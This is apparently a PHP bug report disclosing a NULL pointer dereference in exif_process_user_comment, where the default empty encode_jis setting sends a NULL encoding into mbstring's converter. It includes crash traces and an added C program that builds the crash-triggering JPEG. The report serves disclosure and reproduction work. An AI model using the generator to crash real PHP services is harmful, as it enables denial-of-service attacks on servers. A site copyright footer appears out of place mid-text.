[2016-07-19 03:11 UTC] nguyenvuhoang199321 at gmail dot com
Description:
------------
There is a bug in exif_process_user_comment when it tries to encode a JIS string.
```
    else if (!memcmp(szValuePtr, "JIS\0\0\0\0\0", 8)) {
        /* JIS should be translated to MB or we leave it to the user - leave it to the user */
        *pszEncoding = estrdup((const char*)szValuePtr);
        szValuePtr = szValuePtr+8;
        ByteCount -= 8;
        /* XXX this will fail again if encoding_converter returns on error something different than SIZE_MAX */
        if (zend_multibyte_encoding_converter(
                (unsigned char**)pszInfoPtr,
                &len,
                (unsigned char*)szValuePtr,
                ByteCount,
                zend_multibyte_fetch_encoding(ImageInfo->encode_jis), /* NULL when exif.encode_jis is "" (the default) */
                zend_multibyte_fetch_encoding(ImageInfo->motorola_intel ? ImageInfo->decode_jis_be : ImageInfo->decode_jis_le)
            ) == (size_t)-1) {
            len = exif_process_string_raw(pszInfoPtr, szValuePtr, ByteCount);
        }
        return len;
```
As you can see, at the call zend_multibyte_fetch_encoding(ImageInfo->encode_jis): in PHP_INI_BEGIN, encode_jis is set to an empty string, so this call returns NULL, which is then passed on to zend_multibyte_encoding_converter. If this PHP build is compiled with *mbstring*, that NULL pointer is passed to mbfl_buffer_converter_new2 as the *to* pointer.
```
mbfl_buffer_converter_new2(
    const mbfl_encoding *from,
    const mbfl_encoding *to,
    int buf_initsz)
{
    ******SNIP********
    /* initialize */
    convd->from = from;
    convd->to = to;
    /* create convert filter */
    convd->filter1 = NULL;
    convd->filter2 = NULL;
    if (mbfl_convert_filter_get_vtbl(convd->from->no_encoding, convd->to->no_encoding) != NULL) {
    ******SNIP********
```
Because neither of the two pointers *from* and *to* is checked, the NULL pointer is stored directly in convd->to, and the result is a crash when mbfl_convert_filter_get_vtbl is called.
Here is the crashing JPEG file: https://drive.google.com/file/d/0B0D1DYQpkA9URnRROVdLdG5jdFE/view?usp=sharing
This bug also reproduces on Mac OS X and Windows.
Test script:
---------------
<?php
$exif = exif_read_data('null.jpg');
var_dump($exif);
?>
Expected result:
----------------
~/Sources_Ext/audit » ./php exif.php
[1] 19270 segmentation fault (core dumped) ./php exif.php
Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x1234de0 --> 0x2e ('.')
RCX: 0xd ('\r')
RDX: 0x0
RSI: 0x7ffff3e585a0 --> 0x0
RDI: 0x7ffff3e00040 --> 0x0
RBP: 0x7fffffffa760 --> 0x7fffffffa7f0 --> 0x7fffffffa830 --> 0x7fffffffa8a0 --> 0x7fffffffa9d0 --> 0x7fffffffaa30 --> 0x7fffffffab60 --> 0x7fffffffabc0 --> 0x7fffffffac00 --> 0x7fffffffac30 --> 0x7fffffffacd0 --> 0x7fffffffad10 --> 0x7fffffffadf0 --> 0x7fffffffb0d0 --> 0x7fffffffb100 --> 0x7fffffffb130 --> 0x7fffffffb170 --> 0x7fffffffb280 --> 0x7fffffffd580 --> 0x7fffffffe900 --> 0x7fffffffea50 --> 0xa15f90 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffa730 --> 0x7ffff3e70168 --> 0x7fff0053494a
RIP: 0x6af72d (<mbfl_buffer_converter_new2+115>: mov edx,DWORD PTR [rax])
R8 : 0x276
R9 : 0x0
R10: 0x9 ('\t')
R11: 0x7ffff67e2730 --> 0xfffda400fffda12f
R12: 0x42c170 (<_start>: xor ebp,ebp)
R13: 0x7fffffffeb30 --> 0x2
R14: 0x7ffff3e14030 --> 0x7ffff3e5fb80 --> 0x9a28f2 (<ZEND_DO_ICALL_SPEC_HANDLER>: push rbp)
R15: 0x7ffff3e5fb80 --> 0x9a28f2 (<ZEND_DO_ICALL_SPEC_HANDLER>: push rbp)
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x6af71d <mbfl_buffer_converter_new2+99>: mov QWORD PTR [rax+0x8],0x0
0x6af725 <mbfl_buffer_converter_new2+107>: mov rax,QWORD PTR [rbp-0x8]
0x6af729 <mbfl_buffer_converter_new2+111>: mov rax,QWORD PTR [rax+0x30]
=> 0x6af72d <mbfl_buffer_converter_new2+115>: mov edx,DWORD PTR [rax]
0x6af72f <mbfl_buffer_converter_new2+117>: mov rax,QWORD PTR [rbp-0x8]
0x6af733 <mbfl_buffer_converter_new2+121>: mov rax,QWORD PTR [rax+0x28]
0x6af737 <mbfl_buffer_converter_new2+125>: mov eax,DWORD PTR [rax]
0x6af739 <mbfl_buffer_converter_new2+127>: mov esi,edx
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffa730 --> 0x7ffff3e70168 --> 0x7fff0053494a
0008| 0x7fffffffa738 --> 0xa0f3e00040
0016| 0x7fffffffa740 --> 0x0
0024| 0x7fffffffa748 --> 0x1234de0 --> 0x2e ('.')
0032| 0x7fffffffa750 --> 0x70168
0040| 0x7fffffffa758 --> 0x7ffff3e585a0 --> 0x0
0048| 0x7fffffffa760 --> 0x7fffffffa7f0 --> 0x7fffffffa830 --> 0x7fffffffa8a0 --> 0x7fffffffa9d0 --> 0x7fffffffaa30 --> 0x7fffffffab60 --> 0x7fffffffabc0 --> 0x7fffffffac00 --> 0x7fffffffac30 --> 0x7fffffffacd0 --> 0x7fffffffad10 --> 0x7fffffffadf0 --> 0x7fffffffb0d0 --> 0x7fffffffb100 --> 0x7fffffffb130 --> 0x7fffffffb170 --> 0x7fffffffb280 --> 0x7fffffffd580 --> 0x7fffffffe900 --> 0x7fffffffea50 --> 0xa15f90 (<__libc_csu_init>: push r15)
0056| 0x7fffffffa768 --> 0x6b8e38 (<php_mb_zend_encoding_converter+128>: mov QWORD PTR [rbp-0x48],rax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000006af72d in mbfl_buffer_converter_new2 (from=0x1234de0 <mbfl_encoding_jis>,
to=0x0, buf_initsz=0xa0)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/mbstring/libmbfl/mbfl/mbfilter.c:158
158 if (mbfl_convert_filter_get_vtbl(convd->from->no_encoding, convd->to->no_encoding) != NULL) {
gdb-peda$ bt
#0 0x00000000006af72d in mbfl_buffer_converter_new2 (
from=0x1234de0 <mbfl_encoding_jis>, to=0x0, buf_initsz=0xa0)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/mbstring/libmbfl/mbfl/mbfilter.c:158
#1 0x00000000006b8e38 in php_mb_zend_encoding_converter (to=0x7fffffffaec8,
to_length=0x7fffffffa878, from=0x7ffff3e71388 'A' <repeats 160 times>,
from_length=0xa0, encoding_to=0x0, encoding_from=0x1234de0 <mbfl_encoding_jis>)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/mbstring/mbstring.c:935
#2 0x0000000000969647 in zend_multibyte_encoding_converter (to=0x7fffffffaec8,
to_length=0x7fffffffa878, from=0x7ffff3e71388 'A' <repeats 160 times>,
from_length=0xa0, encoding_to=0x0, encoding_from=0x1234de0 <mbfl_encoding_jis>)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/Zend/zend_multibyte.c:150
#3 0x0000000000613880 in exif_process_user_comment (ImageInfo=0x7fffffffae50,
pszInfoPtr=0x7fffffffaec8, pszEncoding=0x7fffffffaed8,
szValuePtr=0x7ffff3e71388 'A' <repeats 160 times>, ByteCount=0xa0)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/exif/exif.c:2649
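The Drive link above may not stay available, but the crash input can be rebuilt from the description: a JPEG whose Exif APP1 segment carries a UserComment (tag 0x9286) whose 8-byte character-code field is "JIS\0\0\0\0\0", followed by 160 'A' bytes (the from_length=0xa0 in the backtrace). The generator below is an added example written for this page, not the reporter's file and not PHP's own code; every byte it writes is constructed here. It emits a minimal SOI/APP1/EOI container with no image frame, so exif_read_data() may warn about the missing image data; the crash itself only occurs on an affected PHP built with mbstring and the default empty exif.encode_jis setting. The walker at the end shows how an Exif reader reaches the UserComment (IFD0 -> ExifIFDPointer -> sub-IFD -> tag 0x9286) and confirms the file takes the JIS branch.

```c
/* build_jis_usercomment.c - writes null.jpg for the test script above.
 * Added example; the sample bytes are constructed, not taken from the
 * reporter's file. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define COMMENT_BODY_LEN 160                        /* 0xa0 'A' bytes, as in the backtrace */
#define USERCOMMENT_LEN  (8 + COMMENT_BODY_LEN)     /* 8-byte character code + body */

/* TIFF-relative layout ("II" little-endian, one entry per IFD). */
#define IFD_LEN     (2 + 12 + 4)                    /* entry count + entry + next-IFD link */
#define IFD0_OFF    8                               /* directly after the TIFF header */
#define EXIFIFD_OFF (IFD0_OFF + IFD_LEN)            /* 26 */
#define COMMENT_OFF (EXIFIFD_OFF + IFD_LEN)         /* 44 */
#define TIFF_LEN    (COMMENT_OFF + USERCOMMENT_LEN) /* 212 */

#define APP1_LEN    (2 + 6 + TIFF_LEN)              /* length field + "Exif\0\0" + TIFF = 220 */
#define JPEG_LEN    (2 + 2 + APP1_LEN + 2)          /* SOI + APP1 marker + APP1 + EOI = 226 */

static void put_u16le(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }
static void put_u32le(uint8_t *p, uint32_t v) { put_u16le(p, v & 0xffff); put_u16le(p + 2, v >> 16); }
uint16_t read_u16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
uint32_t read_u32le(const uint8_t *p) { return read_u16le(p) | ((uint32_t)read_u16le(p + 2) << 16); }

/* One 12-byte IFD entry: tag, type, count, value-or-offset. */
static void put_entry(uint8_t *p, uint16_t tag, uint16_t type, uint32_t count, uint32_t val)
{
    put_u16le(p, tag); put_u16le(p + 2, type); put_u32le(p + 4, count); put_u32le(p + 8, val);
}

/* Fills out (at least JPEG_LEN bytes) and returns the number of bytes written. */
size_t build_jis_usercomment_jpeg(uint8_t *out)
{
    uint8_t *p = out, *tiff;
    *p++ = 0xFF; *p++ = 0xD8;                      /* SOI */
    *p++ = 0xFF; *p++ = 0xE1;                      /* APP1 marker */
    *p++ = APP1_LEN >> 8; *p++ = APP1_LEN & 0xff;  /* segment length, big-endian, counts itself */
    memcpy(p, "Exif\0\0", 6); p += 6;
    tiff = p;
    memcpy(tiff, "II", 2); put_u16le(tiff + 2, 42); put_u32le(tiff + 4, IFD0_OFF);
    /* IFD0: one entry, ExifIFDPointer (0x8769, LONG) -> Exif sub-IFD */
    put_u16le(tiff + IFD0_OFF, 1);
    put_entry(tiff + IFD0_OFF + 2, 0x8769, 4, 1, EXIFIFD_OFF);
    put_u32le(tiff + IFD0_OFF + 14, 0);
    /* Exif IFD: one entry, UserComment (0x9286, UNDEFINED), value stored out of line */
    put_u16le(tiff + EXIFIFD_OFF, 1);
    put_entry(tiff + EXIFIFD_OFF + 2, 0x9286, 7, USERCOMMENT_LEN, COMMENT_OFF);
    put_u32le(tiff + EXIFIFD_OFF + 14, 0);
    /* UserComment value: "JIS" character code (8 bytes) then the body */
    memcpy(tiff + COMMENT_OFF, "JIS\0\0\0\0\0", 8);
    memset(tiff + COMMENT_OFF + 8, 'A', COMMENT_BODY_LEN);
    p = tiff + TIFF_LEN;
    *p++ = 0xFF; *p++ = 0xD9;                      /* EOI */
    return (size_t)(p - out);
}

/* Walks the file the way an Exif reader does (IFD0 -> ExifIFDPointer -> UserComment)
 * and returns 1 if the UserComment value starts with the "JIS" character code.
 * Little-endian TIFF only, with bounds checks against the buffer length. */
int usercomment_is_jis(const uint8_t *jpeg, size_t n)
{
    const uint8_t *tiff;
    size_t tlen;
    uint32_t ifd, i, count, exififd = 0, comment = 0, comment_len = 0;
    if (n < 20 || jpeg[2] != 0xFF || jpeg[3] != 0xE1 || memcmp(jpeg + 6, "Exif\0\0", 6)) return 0;
    tiff = jpeg + 12; tlen = n - 12;
    if (memcmp(tiff, "II", 2) || read_u16le(tiff + 2) != 42) return 0;
    ifd = read_u32le(tiff + 4);
    if ((size_t)ifd + 2 > tlen) return 0;
    count = read_u16le(tiff + ifd);
    if ((size_t)ifd + 2 + 12 * (size_t)count > tlen) return 0;
    for (i = 0; i < count; i++)
        if (read_u16le(tiff + ifd + 2 + 12 * i) == 0x8769) exififd = read_u32le(tiff + ifd + 2 + 12 * i + 8);
    if (!exififd || (size_t)exififd + 2 > tlen) return 0;
    count = read_u16le(tiff + exififd);
    if ((size_t)exififd + 2 + 12 * (size_t)count > tlen) return 0;
    for (i = 0; i < count; i++) {
        const uint8_t *e = tiff + exififd + 2 + 12 * i;
        if (read_u16le(e) == 0x9286) { comment_len = read_u32le(e + 4); comment = read_u32le(e + 8); }
    }
    if (!comment || comment_len < 8 || (size_t)comment + comment_len > tlen) return 0;
    return memcmp(tiff + comment, "JIS\0\0\0\0\0", 8) == 0;
}

int main(void)
{
    uint8_t buf[JPEG_LEN];
    size_t n = build_jis_usercomment_jpeg(buf);
    FILE *f = fopen("null.jpg", "wb");
    if (!f) { perror("null.jpg"); return 1; }
    fwrite(buf, 1, n, f);
    fclose(f);
    printf("wrote null.jpg (%zu bytes, UserComment charcode JIS: %d)\n", n, usercomment_is_jis(buf, n));
    return 0;
}
```

Compile with `cc -o build_jis_usercomment build_jis_usercomment.c`, run it in the directory with exif.php, then run the test script from the report against the null.jpg it writes. Swapping the "JIS" prefix for "UNICODE\0" would exercise the neighbouring branch in exif_process_user_comment instead, which is why the walker checks the character code rather than only the tag.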
Copyright © 2001-2025 The PHP Group. All rights reserved.
Here is the crash in PHP 5.5.34 (the default install on Mac OS X 10.11.5):
```
(lldb) r exif.php
Process 32368 launched: './php_mac' (x86_64)
Process 32368 stopped
* thread #1: tid = 0x4bacc5, 0x000000010017f8b4 php_mac`mbfl_buffer_converter_new2 + 78, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
    frame #0: 0x000000010017f8b4 php_mac`mbfl_buffer_converter_new2 + 78
php_mac`mbfl_buffer_converter_new2:
->  0x10017f8b4 <+78>: mov    esi, dword ptr [r15]
    0x10017f8b7 <+81>: call   0x100183610               ; mbfl_convert_filter_get_vtbl
    0x10017f8bc <+86>: test   rax, rax
    0x10017f8bf <+89>: je     0x10017f8e7               ; <+129>
(lldb) register read
General Purpose Registers:
       rax = 0x0000000000000000
       rbx = 0x0000000101c65b98
       rcx = 0x0000000000000009
       rdx = 0x00000000ffffffff
       rdi = 0x000000000000002e
       rsi = 0x0000000000000038
       rbp = 0x00007fff5fbfe120
       rsp = 0x00007fff5fbfe100
        r8 = 0x0000000000000000
        r9 = 0x0000000100936780  php_mac.__DATA.__const + 180352
       r10 = 0x0000000101c66110
       r11 = 0x00000000000000b8
       r12 = 0x0000000100936780  php_mac.__DATA.__const + 180352
       r13 = 0x00000000000000a0
       r14 = 0x00000000000000a0
       r15 = 0x0000000000000000
       rip = 0x000000010017f8b4  php_mac`mbfl_buffer_converter_new2 + 78
    rflags = 0x0000000000010202
        cs = 0x000000000000002b
        fs = 0x0000000000000000
        gs = 0x0000000000000000
```